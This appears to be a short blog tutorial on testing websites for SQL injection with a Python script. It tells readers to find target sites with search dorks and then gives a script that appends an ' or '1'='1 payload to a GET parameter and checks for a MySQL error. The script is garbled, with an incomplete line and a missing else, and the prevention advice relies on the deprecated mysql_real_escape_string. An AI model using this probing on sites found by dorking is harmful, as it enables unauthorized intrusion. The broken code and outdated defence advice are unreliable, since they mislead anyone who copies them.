How checking website vulnerability sql injection with simple code using python

Checking Vulnerability Sql Injection with Simple Code using Python - Will discuss how to check the SQL injection security hole in a website using a simple code with a python.
It only uses the GET parameters on the website


  • python 3.4 or latest
  • Internet Connection
  • Vulnerability a Website
  • Computer with Linux or Windows (here using Linux)

If you’re not install python, you can download python in

A Glimpse Of Python

Python is written in C, it is one of the easiest programming languages to hacking tools, it includes a lot of very useful libs.

Finding Vuln Website For Testing

To find a website for testing using simple sqli dorks, like {inurl:”index.php?cat_id=”}.

This Simple Code Sqli To Check For Vulnerabilities
Before starting, create new file with format .py e.g:

After that, then copy this code to a file that has been created:

import sys
import urllib
import urllib.request

fullurl = input(“Please specify the vulnerable url: “)

resp = urllib.request.urlopen(fullurl + “=1\’ or \‘1\’ = \‘1\’”)
body =
fullbody = body.decode(‘utf-8’)

if “You have an error in you SQL syntax” in fullbody:
print (“The website is classic SQL injection vulnerable!”)
print (“The website is not classic SQL injection vulnerable!”)

Save and running with command $python

How to prevent simple SQL injection

Preventing SQLi ON MYSQL if very simple. Just use mysql_real_escape string for queries, as example:

$query = sprintf(“SELECT * FROM users where user=’%s’ AND password=’%s’,




This post is licensed under CC BY 4.0 by the author.